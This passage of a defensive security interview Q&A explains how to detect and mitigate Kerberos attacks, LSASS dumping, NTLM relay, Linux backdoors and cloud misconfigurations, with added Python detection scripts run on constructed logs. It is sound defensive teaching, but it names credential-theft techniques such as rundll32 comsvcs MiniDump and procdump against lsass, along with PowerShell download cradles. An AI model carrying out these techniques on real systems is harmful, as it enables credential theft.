Exploits Kerberos accounts that have "Do not require Kerberos preauthentication" enabled.
Attackers request a TGT (Ticket Granting Ticket); the AS-REP it returns contains data encrypted with the user's key, which they brute-force offline.
Detection:
Look for Event ID 4768 with Pre-Authentication Type 0 and Ticket Encryption Type 0x17 (RC4).
Monitor Kerberos TGT requests for anomalies (many such requests from one client).
Mitigation:
Enforce pre-authentication for all users.
Use strong passwords and MFA.

61. How does a Silver Ticket attack work?

Answer:

Attackers forge TGS (Ticket Granting Service) tickets with a stolen service account hash for lateral movement to that service.
Detection:
A forged service ticket never touches a DC, so look for Event ID 4624 logons on the service host with no matching Event ID 4769 (TGS request) on any DC.
Check for service access from unexpected accounts or with anomalous ticket fields.
Mitigation:
Rotate service account passwords regularly (gMSAs do this automatically).
Implement LSA Protection and the Protected Users group.

62. What is a BPFdoor backdoor, and how do you detect it?

Answer:

BPFdoor is a Linux backdoor that attaches a Berkeley Packet Filter (BPF) to a raw socket so it can wait for a "magic" packet without listening on a port.
Detection:
Look for processes holding packet (raw) sockets with BPF filters attached (ss -0pb); a user-space process that is not a sniffer should not have one.
Check for process-name masquerading: the backdoor renames itself to look like a system daemon, so compare the name in ps with the binary behind /proc/<pid>/exe and look for deleted or /dev/shm-resident executables.
Look for network traffic anomalies and for the temporary iptables redirect rules it adds when activated.
Mitigation:
Use EDR solutions for Linux (Falco, Wazuh).
Restrict root access and disable unused services.

63. How do you investigate a credential stuffing attack?

Answer:

Credential stuffing reuses leaked usernames/passwords on multiple sites.

Detection:
Monitor for mass login attempts from one IP.
Identify rapid failed logins from multiple locations.
Mitigation:
Enforce MFA and CAPTCHA on login portals.
Implement rate limiting on login attempts.

64. What is Living Off the Land (LotL) attack, and how do you detect it?

Answer:

Attackers use legitimate system tools (e.g., PowerShell, wmic, rundll32).

Detection:
Monitor for unusual PowerShell execution (Event ID 4104).
Track wmic process call create executions.
Mitigation:
Restrict PowerShell execution policies.
Use Application Whitelisting (AppLocker, WDAC).

65. How does an attacker use Cobalt Strike, and how do you detect it?

Answer:

Cobalt Strike is a commercial red teaming framework whose Beacon implant is widely abused by threat actors.

Detection:
Look for beaconing C2 traffic: regular check-ins with a fixed sleep interval plus jitter, over HTTP/S or DNS (A/TXT lookups to a single domain).
Check for default Beacon artifacts: known malleable-profile URIs and named pipes, and self-signed or mismatched TLS certificates on team servers.
Mitigation:
Block known Cobalt Strike payloads using YARA rules and in-memory scanning.
Use endpoint monitoring tools (Sysmon, Velociraptor).

66. How do you analyze an NTLM Relay attack?

Answer:

An NTLM relay forwards a victim's NTLM challenge-response to another server, so the attacker authenticates as the victim without ever learning the password.

Detection:
Monitor for SMB/LDAP authentication arriving from hosts that are not the expected client, and for NTLM logons where the source workstation name does not match the source IP.
Identify NTLMv1 and other NTLM usage via the NTLM audit log (Event ID 8004).
Mitigation:
Enforce Kerberos authentication over NTLM.
Require SMB signing and LDAP signing/channel binding, and disable SMBv1 and LLMNR/NBT-NS so authentication cannot be coerced in the first place.

67. How do you investigate a VPN compromise?

Answer:

Check for unusual VPN logins (from foreign IPs).
Look for multiple concurrent logins from different locations.
Monitor VPN session durations for anomalies.
Mitigation:
Enforce MFA for VPN access.
Implement Geo-blocking for unauthorized regions.

68. How does an attacker exploit an exposed Elasticsearch instance?

Answer:

Unauthenticated Elasticsearch databases (default port 9200) can be accessed remotely.

Detection:
Check for unauthorized API requests (_search?pretty, _cat/indices).
Look for data exfiltration via large responses.
Mitigation:
Restrict access with firewall rules.
Enable authentication and TLS encryption.

69. How do you respond to a suspected insider threat?

Answer:

Monitor for data exfiltration via USB or email.
Review SIEM alerts for unusual logins from internal users.
Analyze privilege escalation events.
Mitigation:
Implement User and Entity Behavior Analytics (UEBA).
Restrict USB device usage with DLP policies.

70. How do you detect a phishing email without opening it?

Answer:

Check the email headers (Authentication-Results: SPF, DKIM, DMARC; Return-Path versus From).
Look for misspelled sender domains (microsoft-support.com).
Hover over links to detect fake URLs.
Use VirusTotal to scan attachments.
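The header checks in Q6, Q51 and Q70 (SPF/DKIM/DMARC results, envelope sender versus From, lookalike domains such as examp1e.com, and links whose visible text disagrees with their href) can be automated with nothing but the standard library. The following Python is an added example, not part of the original document; the message, the protected-brand list and the confusable-character table are constructed assumptions, and the domains and IP address are fictional.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed message (not a real sample). The headers are what the receiving
# MTA at corp.example would have stamped; every domain and address is fictional.
RAW_MESSAGE = """\
Return-Path: <bounce@mail-delivery.example.net>
Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=mail-delivery.example.net; dkim=none; dmarc=fail header.from=rnicrosoft-support.com
From: "Microsoft Support" <helpdesk@rnicrosoft-support.com>
Reply-To: verify@rnicrosoft-support.com
To: alice@corp.example
Subject: Action required: password expires today
Content-Type: text/html; charset="utf-8"

<html><body><p>Your password expires today. Reset it now:</p>
<a href="http://203.0.113.45/login">https://login.microsoft.com/reset</a>
</body></html>
"""

# Brands worth protecting and the domains that may legitimately use them (assumed).
PROTECTED_BRANDS = {'microsoft': {'microsoft.com'}, 'corp': {'corp.example'}, 'example': {'example.com'}}
# Character substitutions that fool the eye; applied before comparing to a brand.
CONFUSABLES = [('rn', 'm'), ('vv', 'w'), ('0', 'o'), ('1', 'l'), ('3', 'e'), ('5', 's')]
_ANCHOR = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def normalize_label(label: str) -> str:
    label = label.lower()
    for bad, good in CONFUSABLES:
        label = label.replace(bad, good)
    return label


def lookalike_brand(domain: str):
    """Brand a domain imitates, or None for a legitimate or unrelated domain."""
    domain = domain.lower()
    second_level = domain.split('.')[-2] if '.' in domain else domain
    for brand, legit in PROTECTED_BRANDS.items():
        if domain in legit:
            return None
        if brand in normalize_label(second_level):
            return brand
    return None


def auth_results(msg) -> dict:
    """spf/dkim/dmarc verdicts from the receiving MTA's Authentication-Results header."""
    header = str(msg.get('Authentication-Results', ''))
    return {k.lower(): v.lower() for k, v in re.findall(r'\b(spf|dkim|dmarc)=(\w+)', header, re.I)}


def link_mismatches(html: str):
    """Links whose visible text is a URL on one host but whose href points elsewhere."""
    out = []
    for href, text in _ANCHOR.findall(html):
        shown = re.sub(r'<[^>]+>', '', text).strip()
        if shown.lower().startswith(('http://', 'https://')):
            shown_host, real_host = urlparse(shown).hostname, urlparse(href).hostname
            if shown_host != real_host:
                out.append((shown_host, real_host))
    return out


def _domain(msg, header):
    value = msg.get(header)
    return parseaddr(str(value))[1].split('@')[-1].lower() if value else None


def triage(raw: str):
    """Return the list of red flags found in a raw RFC 5322 message."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []
    auth = auth_results(msg)
    for mech in ('spf', 'dkim', 'dmarc'):
        if auth.get(mech) != 'pass':
            findings.append(f"{mech}_{auth.get(mech, 'missing')}")
    from_dom = _domain(msg, 'From')
    return_path_dom = _domain(msg, 'Return-Path')
    reply_dom = _domain(msg, 'Reply-To') or from_dom
    if return_path_dom and return_path_dom != from_dom:
        findings.append('envelope_from_mismatch')
    if reply_dom != from_dom:
        findings.append('reply_to_mismatch')
    for dom in sorted({from_dom, reply_dom}):
        brand = lookalike_brand(dom)
        if brand:
            findings.append(f'lookalike:{dom}->{brand}')
    body = msg.get_body(preferencelist=('html', 'plain'))
    for shown, real in link_mismatches(body.get_content() if body else ''):
        findings.append(f'link_mismatch:{shown}->{real}')
    return findings
```

Only trust the Authentication-Results header stamped by your own MTA (the authserv-id, mx.corp.example here); an attacker can add a forged one further down, so production code should pick the header by that identifier rather than the first match.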

71. What is an LSASS Dump, and how do you detect it?

Answer:

LSASS (Local Security Authority Subsystem Service) dumping is used to extract credentials from memory.
Attackers use tools like Mimikatz, procdump.exe, rundll32 with comsvcs.dll MiniDump, or Task Manager's "Create dump file".
Detection:
Sysmon Event ID 10 (ProcessAccess) with TargetImage lsass.exe, especially access masks that include PROCESS_VM_READ (0x10) such as 0x1010, 0x1410 or 0x1fffff, or a CallTrace containing UNKNOWN (code running from unbacked memory).
Windows Event ID 4656 (handle request for LSASS), which only appears if a SACL on lsass.exe has been configured.
Unexpected access to lsass.exe by non-standard processes (anything outside a small allowlist of OS and AV components).
Mitigation:
Enable Credential Guard.
Run LSASS as a Protected Process Light (RunAsPPL registry setting).
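The Sysmon detections in Q58 (Event ID 8, CreateRemoteThread) and Q71 (Event ID 10, ProcessAccess on LSASS) share one decision: who touched the target, with which rights, and from what code. The following Python is an added example, not part of the original document, that applies that decision to constructed Sysmon events. The access-right constants are the documented winnt.h values; the allowlist of images and every file path are assumptions to replace with your own baseline (and a path alone is spoofable, so pair it with signer or PPL information where your telemetry has it).

```python
# Windows process access rights (winnt.h) that matter for credential theft and injection.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Images that open LSASS or create remote threads on a healthy host. Assumed
# starting point: build the real list from your own baseline.
TRUSTED_SYSTEM_IMAGES = {
    r'c:\windows\system32\csrss.exe', r'c:\windows\system32\wininit.exe',
    r'c:\windows\system32\services.exe', r'c:\windows\system32\svchost.exe',
    r'c:\program files\windows defender\msmpeng.exe',
}

# Constructed Sysmon events (not real telemetry): 10 = ProcessAccess, 8 = CreateRemoteThread.
SAMPLE_EVENTS = [
    {'event_id': 10, 'source_image': r'C:\Windows\System32\csrss.exe',
     'target_image': r'C:\Windows\System32\lsass.exe', 'granted_access': 0x1400,
     'call_trace': r'C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\csrss.exe+1a2b'},
    {'event_id': 10, 'source_image': r'C:\Users\bob\AppData\Local\Temp\procdump64.exe',
     'target_image': r'C:\Windows\System32\lsass.exe', 'granted_access': 0x1fffff,
     'call_trace': r'C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Users\bob\AppData\Local\Temp\procdump64.exe+4f10'},
    {'event_id': 10, 'source_image': r'C:\Windows\System32\rundll32.exe',
     'target_image': r'C:\Windows\System32\lsass.exe', 'granted_access': 0x1010,
     'call_trace': r'C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(00000210A3F01C7E)'},
    {'event_id': 10, 'source_image': r'C:\Windows\System32\Taskmgr.exe',
     'target_image': r'C:\Windows\System32\lsass.exe', 'granted_access': 0x1410,
     'call_trace': r'C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\Taskmgr.exe+3c21'},
    {'event_id': 8, 'source_image': r'C:\Users\bob\Downloads\update.exe',
     'target_image': r'C:\Windows\explorer.exe', 'start_module': '', 'start_function': ''},
    {'event_id': 8, 'source_image': r'C:\Windows\System32\csrss.exe',
     'target_image': r'C:\Windows\System32\conhost.exe',
     'start_module': r'C:\Windows\System32\ntdll.dll', 'start_function': 'LdrInitializeThunk'},
]


def triage_sysmon(events):
    """Return findings for LSASS handle abuse (Event ID 10) and remote threads (Event ID 8)."""
    findings = []
    for e in events:
        src, tgt = e['source_image'].lower(), e['target_image'].lower()
        if e['event_id'] == 10 and tgt.endswith(r'\lsass.exe') and src not in TRUSTED_SYSTEM_IMAGES:
            reasons = []
            if e['granted_access'] & PROCESS_VM_READ:
                reasons.append('memory_read')        # enough rights to MiniDump the process
            if e['granted_access'] & INJECT_RIGHTS:
                reasons.append('write_or_thread')    # injection-capable handle
            if 'unknown' in e.get('call_trace', '').lower():
                reasons.append('unbacked_code')      # caller is memory no module backs
            if reasons:
                findings.append({'type': 'lsass_access', 'source': e['source_image'],
                                 'access': hex(e['granted_access']), 'reasons': reasons,
                                 'severity': 'high' if set(reasons) - {'memory_read'} else 'medium'})
        elif e['event_id'] == 8 and src != tgt:
            unbacked = not e.get('start_module')   # thread starts outside any loaded module
            if unbacked or src not in TRUSTED_SYSTEM_IMAGES:
                findings.append({'type': 'remote_thread', 'source': e['source_image'],
                                 'target': e['target_image'],
                                 'reasons': ['thread_start_outside_module'] if unbacked else ['unexpected_source'],
                                 'severity': 'high' if unbacked else 'medium'})
    return findings


if __name__ == '__main__':
    for f in triage_sysmon(SAMPLE_EVENTS):
        print(f)
```

The medium-severity Task Manager hit is deliberate: an administrator creating a dump is legitimate until proven otherwise, but it is exactly how a lazy attacker dumps LSASS, so it is worth a ticket rather than suppression.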

72. What is Kerberoasting, and how do you detect it?

Answer:

Attackers extract Kerberos TGS (service tickets) for accounts that have an SPN and brute-force them offline.
Detection:
Look for Event ID 4769 (TGS Request) with Ticket Encryption Type 0x17 (RC4).
Monitor for large numbers of TGS requests for distinct service accounts from a single user in a short window.
Mitigation:
Enforce AES encryption for Kerberos tickets (msDS-SupportedEncryptionTypes) and remove RC4 support.
Use strong, randomly generated passwords for service accounts, or gMSAs.
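Q45, Q60 and Q72 describe the two offline-cracking attacks against Kerberos in terms of the same two DC events. The following Python is an added example, not part of the original document, that implements both detections over constructed 4768/4769 events: Kerberoasting as one requesting account collecting RC4 (0x17) service tickets for many distinct service accounts inside a window, and AS-REP roasting as any TGT request with Pre-Authentication Type 0. The account names, IPs and thresholds are assumptions; note that the ServiceName field of a 4769 is the account that owns the SPN, not the SPN string itself.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # TicketEncryptionType an attacker asks for: fastest to crack offline


def _t(seconds):
    return datetime(2024, 3, 1, 9, 0, 0) + timedelta(seconds=seconds)


# Constructed sample events (not real logs). In a 4769 the ServiceName field is the
# *account* that owns the SPN (svc_sql01, or a computer account ending in $).
SAMPLE_EVENTS = (
    [{'time': _t(i * 5), 'event_id': 4769, 'account': 'jsmith', 'client_ip': '10.0.0.44',
      'service': svc, 'enc_type': RC4_HMAC}
     for i, svc in enumerate(['svc_sql01', 'svc_web', 'svc_sql02', 'svc_reports',
                              'svc_backup', 'svc_exchange', 'svc_sccm', 'svc_sharepoint'])]
    # an ordinary user opening two services with AES tickets
    + [{'time': _t(60), 'event_id': 4769, 'account': 'mwhite', 'client_ip': '10.0.0.51',
        'service': 'svc_web', 'enc_type': 0x12},
       {'time': _t(65), 'event_id': 4769, 'account': 'mwhite', 'client_ip': '10.0.0.51',
        'service': 'FS01$', 'enc_type': 0x12}]
    # AS-REP roasting: TGT requests for accounts that do not require pre-authentication
    + [{'time': _t(120), 'event_id': 4768, 'account': 'svc_legacy', 'client_ip': '10.0.0.44',
        'preauth_type': 0, 'enc_type': RC4_HMAC},
       {'time': _t(121), 'event_id': 4768, 'account': 'tsmith', 'client_ip': '10.0.0.44',
        'preauth_type': 0, 'enc_type': RC4_HMAC},
       {'time': _t(130), 'event_id': 4768, 'account': 'mwhite', 'client_ip': '10.0.0.51',
        'preauth_type': 2, 'enc_type': 0x12}]
)


def detect_roasting(events, window_seconds=300, min_rc4_services=5):
    """Kerberoasting: one account requesting RC4 service tickets for many distinct
    service accounts inside the window. AS-REP roasting: any 4768 with
    PreAuthType 0 (the DC handed out encrypted material without a password check)."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)    # requesting account -> (time, service) of RC4 requests
    findings = {}
    for e in sorted(events, key=lambda x: x['time']):
        if e['event_id'] == 4769:
            svc = e['service']
            # computer accounts and krbtgt have long random passwords: not crackable, skip
            if e['enc_type'] != RC4_HMAC or svc.endswith('$') or svc.lower() == 'krbtgt':
                continue
            q = recent[e['account']]
            q.append((e['time'], svc))
            while q and e['time'] - q[0][0] > window:
                q.popleft()
            distinct = {s for _, s in q}
            if len(distinct) >= min_rc4_services:
                f = findings.setdefault((e['account'], 'kerberoast'), {
                    'type': 'kerberoast', 'account': e['account'], 'client_ip': e['client_ip'],
                    'services': set(), 'first': q[0][0], 'last': e['time']})
                f['services'] |= distinct   # keep accumulating so the report lists every target
                f['last'] = e['time']
        elif e['event_id'] == 4768 and e.get('preauth_type') == 0:
            findings[(e['account'], 'asrep_roast')] = {
                'type': 'asrep_roast', 'account': e['account'], 'client_ip': e['client_ip'],
                'enc_type': hex(e['enc_type']), 'time': e['time']}
    out = []
    for f in findings.values():
        if 'services' in f:
            f['services'] = sorted(f['services'])
        out.append(f)
    return out


if __name__ == '__main__':
    for f in detect_roasting(SAMPLE_EVENTS):
        print(f)
```

A single RC4 service ticket is normal on domains that still allow RC4, which is why the Kerberoast rule counts distinct services per requester instead of alerting on 0x17 alone; the AS-REP rule needs no threshold because pre-authentication should never be disabled.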

73. How do you detect a Golden Ticket attack?

Answer:

Attackers create a forged TGT (Ticket Granting Ticket) with the krbtgt hash, typically carrying domain admin group SIDs and an arbitrary lifetime.
Detection:
Event ID 4769 TGS requests, or 4624 logons, for an account with no corresponding 4768 TGT request on any DC.
Look for accounts granting access to multiple unrelated systems, for nonexistent or disabled accounts in Kerberos events, and for ticket lifetimes beyond the domain policy.
Monitor for high-privilege account logins at odd hours.
Mitigation:
Regularly reset the krbtgt account password (twice, to invalidate the previous key).
Enable SID Filtering on trusts and use the Protected Users group.

74. What is a Pass-the-Ticket (PtT) attack, and how do you detect it?

Answer:

Attackers use stolen Kerberos tickets to access systems.

Detection:
Event ID 4769 (TGS Requests) from unusual hosts.
Multiple logins from different locations within a short time.
Mitigation:
Enable logon restrictions for high-privilege accounts.
Deploy Managed Service Accounts (MSA).

75. How do you detect an EternalBlue attack?

Answer:

EternalBlue exploits SMBv1 vulnerabilities (MS17-010) to spread malware (WannaCry, NotPetya).

Detection:
High SMB traffic spikes (port 445) from infected hosts scanning the internal network.
Sysmon/EDR alerts for the DoublePulsar backdoor injecting into lsass.exe, and for new services created right after inbound SMB connections.
Event ID 4672 (Privileged Logon) from unexpected systems.
Mitigation:
Disable SMBv1 (Set-SmbServerConfiguration -EnableSMB1Protocol $false).
Patch Windows systems (MS17-010).

76. How do you analyze a DCSync attack?

Answer:

DCSync is used to steal password hashes by imitating a domain controller and asking a real DC to replicate directory changes.

Detection:
Event ID 4662 (Directory Service Access) with Properties containing DS-Replication-Get-Changes / DS-Replication-Get-Changes-All from an account that is not a DC or an approved sync service.
Event ID 4742 (computer account changed) and 4728/4732 (group membership changes) if the attacker first granted themselves replication rights.
Mitigation:
Restrict DC replication permissions to domain controllers and approved sync accounts only.
Use LAPS (Local Administrator Password Solution) so one reused local admin password cannot be the path to a privileged host.
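Q40 and Q76 both rest on recognizing the replication control-access rights inside a 4662 and excluding the principals that legitimately hold them. The following Python is an added example, not part of the original document, that does exactly that over constructed events and joins each 4662 to the 4624 with the same Logon ID to recover the source address, since 4662 itself carries none. The replication-right GUIDs are the documented Active Directory values; the DC names, the sync-account name, the user and the IPs are assumptions.

```python
import re

# Control-access-right GUIDs that show up in the Properties field of a 4662 when a
# principal asks a DC for directory changes (the same rights DCSync needs).
REPLICATION_RIGHTS = {
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2': 'DS-Replication-Get-Changes',
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2': 'DS-Replication-Get-Changes-All',
    '89e95b76-444d-4c62-991a-0facbeda640c': 'DS-Replication-Get-Changes-In-Filtered-Set',
}
_GUID = re.compile(r'[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}', re.I)

# Assumed for the example: the domain's DC computer accounts and the accounts
# that are allowed to replicate (here an Entra ID / Azure AD Connect sync account).
DOMAIN_CONTROLLERS = {'DC01$', 'DC02$'}
REPLICATION_ALLOWLIST = {'MSOL_a1b2c3d4e5f6'}

# Constructed events (not real logs). 4662 carries no source address, so the
# 4624 with the same Logon ID is included to recover where the request came from.
SAMPLE_EVENTS = [
    {'event_id': 4624, 'logon_id': '0x3e7a1', 'user': 'jsmith', 'ip': '10.0.0.44'},
    {'event_id': 4624, 'logon_id': '0x3e7', 'user': 'DC02$', 'ip': '10.0.0.2'},
    {'event_id': 4662, 'subject': 'DC02$', 'logon_id': '0x3e7', 'object_type': 'domainDNS',
     'properties': '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}'},
    {'event_id': 4662, 'subject': 'MSOL_a1b2c3d4e5f6', 'logon_id': '0x51c2', 'object_type': 'domainDNS',
     'properties': '{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}'},
    {'event_id': 4662, 'subject': 'jsmith', 'logon_id': '0x3e7a1', 'object_type': 'domainDNS',
     'properties': '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}'},
    # the same user reading an ordinary attribute: placeholder GUID, not a replication right
    {'event_id': 4662, 'subject': 'jsmith', 'logon_id': '0x3e7a1', 'object_type': 'user',
     'properties': '{12345678-0000-0000-0000-000000000000}'},
]


def detect_dcsync(events, dcs=DOMAIN_CONTROLLERS, allowlist=REPLICATION_ALLOWLIST):
    """Flag 4662 replication-right reads by anything that is not a DC or an approved sync account."""
    logons = {e['logon_id']: e for e in events if e['event_id'] == 4624}
    findings = []
    for e in events:
        if e['event_id'] != 4662:
            continue
        rights = [REPLICATION_RIGHTS[g.lower()] for g in _GUID.findall(e['properties'])
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights or e['subject'] in dcs or e['subject'] in allowlist:
            continue
        source = logons.get(e['logon_id'], {})
        findings.append({
            'subject': e['subject'], 'rights': rights, 'object': e['object_type'],
            'source_ip': source.get('ip'),
            # Get-Changes-All is the right that returns secrets (password hashes)
            'severity': 'critical' if 'DS-Replication-Get-Changes-All' in rights else 'high',
        })
    return findings


if __name__ == '__main__':
    for f in detect_dcsync(SAMPLE_EVENTS):
        print(f)
```

Auditing 4662 needs the "Directory Service Access" subcategory enabled and a SACL on the domain object; without those the event never fires, which is the first thing to verify when this rule stays silent.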

77. How do you detect a Rogue DHCP Server on the network?

Answer:

Attackers set up malicious DHCP servers to provide fake network configurations.

Detection:
Use Wireshark to identify multiple DHCP Offer packets from different sources.
Check for unauthorized devices responding to DHCP Discover requests.
Mitigation:
Enable DHCP Snooping on switches.
Use 802.1X authentication.

78. How do you detect DNS Cache Poisoning?

Answer:

Attackers manipulate DNS cache entries to redirect traffic.

Detection:
Monitor for unexpected changes in DNS A records.
Check for unusual domain resolution anomalies.
Mitigation:
Use DNSSEC to validate DNS responses.
Implement endpoint DNS monitoring.

79. How do you detect an AWS S3 bucket misconfiguration?

Answer:

Public S3 buckets may expose sensitive data.

Detection:
List your buckets with aws s3api list-buckets, then check each one with aws s3api get-bucket-policy-status and aws s3api get-public-access-block (list-buckets alone does not tell you whether a bucket is public).
Use CloudTrail logs (and S3 server access logs) to monitor unauthorized access attempts.
Mitigation:
Restrict S3 bucket access to specific IAM roles.
Enable S3 Block Public Access settings.
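Q44 and Q79 describe the two ways a bucket becomes public (an ACL grant to AllUsers/AuthenticatedUsers, or a bucket policy with a wildcard principal) and the control that neutralizes both (Block Public Access). The following Python is an added example, not part of the original document, that evaluates those three pieces of configuration offline, in the shapes the S3 API returns them, so the logic can be checked before it is wired to boto3. The bucket names, policies and VPC endpoint ID are constructed, and the policy evaluation is a simplification of AWS's own "public" determination (any Condition is treated as scoping the grant).

```python
import json

ALL_USERS = 'http://acs.amazonaws.com/groups/global/AllUsers'
AUTH_USERS = 'http://acs.amazonaws.com/groups/global/AuthenticatedUsers'
READ_ACTIONS = {'s3:*', 's3:Get*', 's3:GetObject'}
LIST_ACTIONS = {'s3:*', 's3:List*', 's3:ListBucket'}
WRITE_ACTIONS = {'s3:*', 's3:Put*', 's3:PutObject', 's3:DeleteObject'}

# Constructed policy documents and ACL grants in the shape the S3 API returns them.
PUBLIC_READ_POLICY = json.dumps({'Version': '2012-10-17', 'Statement': [
    {'Effect': 'Allow', 'Principal': '*', 'Action': ['s3:GetObject', 's3:ListBucket'],
     'Resource': ['arn:aws:s3:::BUCKET', 'arn:aws:s3:::BUCKET/*']}]})
VPCE_ONLY_POLICY = json.dumps({'Version': '2012-10-17', 'Statement': [
    {'Effect': 'Allow', 'Principal': {'AWS': '*'}, 'Action': 's3:GetObject',
     'Resource': 'arn:aws:s3:::BUCKET/*',
     'Condition': {'StringEquals': {'aws:SourceVpce': 'vpce-0123456789abcdef0'}}}]})
ALL_BLOCKED = {'BlockPublicAcls': True, 'IgnorePublicAcls': True,
               'BlockPublicPolicy': True, 'RestrictPublicBuckets': True}
SAMPLE_BUCKETS = [
    ('acme-backups', PUBLIC_READ_POLICY, (), None),       # the classic leak: listable and readable
    ('acme-site', PUBLIC_READ_POLICY, (), ALL_BLOCKED),   # same policy, neutralised by Block Public Access
    ('acme-logs', None, ({'Grantee': {'Type': 'Group', 'URI': ALL_USERS}, 'Permission': 'READ'},), None),
    ('acme-internal', VPCE_ONLY_POLICY, (), None),        # wildcard principal, but scoped to one VPC endpoint
]


def _everyone(principal):
    """True for the principal forms that mean "anyone": "*" or {"AWS": "*"}."""
    if principal == '*':
        return True
    if isinstance(principal, dict):
        aws = principal.get('AWS')
        return aws == '*' or (isinstance(aws, list) and '*' in aws)
    return False


def public_actions(policy):
    """Actions granted to everyone by the bucket policy."""
    actions = set()
    for st in policy.get('Statement', []):
        if st.get('Effect') != 'Allow' or not _everyone(st.get('Principal')):
            continue
        if st.get('Condition'):
            # Simplification: a Condition (aws:SourceVpce, aws:SourceIp, ...) is treated as
            # scoping the grant. AWS's own test is stricter, so confirm with
            # `aws s3api get-bucket-policy-status` before closing a finding.
            continue
        act = st.get('Action', [])
        actions.update([act] if isinstance(act, str) else act)
    return actions


def assess_bucket(name, policy_json=None, acl_grants=(), public_access_block=None):
    """Combine ACL, bucket policy and Block Public Access into one verdict."""
    pab = public_access_block or {}
    findings = []
    acl_public = sorted(g['Permission'] for g in acl_grants
                        if g.get('Grantee', {}).get('URI') in (ALL_USERS, AUTH_USERS))
    if acl_public and not pab.get('IgnorePublicAcls'):
        findings.append('acl:' + ','.join(acl_public))
    actions = public_actions(json.loads(policy_json)) if policy_json else set()
    if actions and not pab.get('RestrictPublicBuckets'):
        if actions & READ_ACTIONS:
            findings.append('policy:read')
        if actions & LIST_ACTIONS:
            findings.append('policy:listing')
        if actions & WRITE_ACTIONS:
            findings.append('policy:write')
    return {'bucket': name, 'public': bool(findings), 'findings': findings}


def assess_all(buckets=SAMPLE_BUCKETS):
    return [assess_bucket(*b) for b in buckets]


if __name__ == '__main__':
    for r in assess_all():
        print(r)
```

In production the three inputs come from get-bucket-acl, get-bucket-policy and get-public-access-block per bucket, with the account-level Block Public Access setting applied on top; the evaluator stays the same.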

80. What are the signs of an Insider Threat attack?

Answer:

Unusual access to high-risk files.
Excessive USB drive usage.
Attempts to disable security software.
Frequent access to HR or financial data.
Mitigation:
Use User and Entity Behavior Analytics (UEBA).
Implement DLP (Data Loss Prevention) policies.

81. What is a Honeytoken, and how is it used?

Answer:

A Honeytoken is a fake credential placed in logs or databases to detect attackers.

Usage:
If accessed, it triggers an alert.
Example:
A fake AWS access key in config.json that sends an alert if used.

82. How do you detect Google Workspace (GSuite) account takeovers?

Answer:

Look for logins from suspicious locations.
Monitor for changes in MFA settings.
Identify bulk email forwarding rules added suddenly.
Mitigation:
Enable Google Advanced Protection.
Use Google Security Investigation Tool.

83. How do you detect a Zero-Logon attack (CVE-2020-1472)?

Answer:

Zero-Logon exploits a flaw in Netlogon's use of AES-CFB8 with an all-zero IV, letting an unauthenticated attacker set a DC's machine account password to empty.

Detection:
Event ID 4742 (computer account changed) for a DC account, with the subject shown as ANONYMOUS LOGON.
Large numbers of Netlogon authentication attempts from one source, and (after patching) Event IDs 5827-5829 from the Netlogon service reporting vulnerable secure channel connections.
Mitigation:
Apply the Microsoft patch for CVE-2020-1472 and enable DC enforcement mode.
Restrict Netlogon connections to trusted hosts.

84. How do you investigate an IoT device compromise?

Answer:

Monitor IoT logs for unauthorized firmware updates.
Check DNS queries to unexpected domains.
Look for outbound traffic spikes from IoT devices.
Mitigation:
Use network segmentation for IoT.
Apply firmware updates regularly.

85. What is an Evil Twin attack, and how do you detect it?

Answer:

An Evil Twin is a rogue Wi-Fi access point that mimics a legitimate network.
Detection:
Use Wireshark to identify APs with identical SSIDs.
Monitor for multiple MAC addresses broadcasting the same network name.
Mitigation:
Enable WPA3 authentication.
Use VPN on public Wi-Fi.

86. What is a Silver Ticket attack, and how do you detect it?

Answer:

Attackers forge a TGS (Service Ticket) for a specific service using that service account's hash, without interacting with the DC.
Detection:
Look for Event ID 4624 logons on the service host with no corresponding Event ID 4769 (TGS Request) on any DC, and for RC4-encrypted tickets where AES is expected.
Look for logins bypassing Kerberos TGT validation.
Mitigation:
Use AES-only authentication.
Rotate service account passwords regularly.

87. How do you detect a Slowloris attack?

Answer:

Slowloris keeps HTTP connections open without completing requests.

Detection:
Monitor for high numbers of half-open HTTP connections.
Identify requests with incomplete headers.
Mitigation:
Use reverse proxies like Nginx or Cloudflare.
Set timeouts on HTTP headers.

88. What is Fileless Malware, and how do you detect it?

Answer:
Malware that runs only in memory, using legitimate interpreters and OS features rather than dropping an executable on disk, so there is little for file-based antivirus to scan.
Detection:
Look for PowerShell launched with base64-encoded commands, hidden windows, or download cradles (Net.WebClient, Invoke-Expression).
Check for persistence that lives in WMI event subscriptions, registry Run keys, or scheduled tasks rather than in files.
Enable PowerShell script block logging (Event ID 4104) so the decoded script is visible even when the command line is obfuscated.
Mitigation:
Keep AMSI integration enabled in Defender (or your EDR) so scripts are scanned as they run.
Use Constrained Language Mode and application control rather than relying on the execution policy, which is not a security boundary.

89. How do you detect a Brute Ratel C4 (BRC4) attack?

Answer:
Brute Ratel is a commercial post-exploitation and C2 framework built to evade EDR that has been abused by APT and ransomware groups.
Detection:
Monitor for beaconing: periodic connections from a single process to an uncommon destination or port.
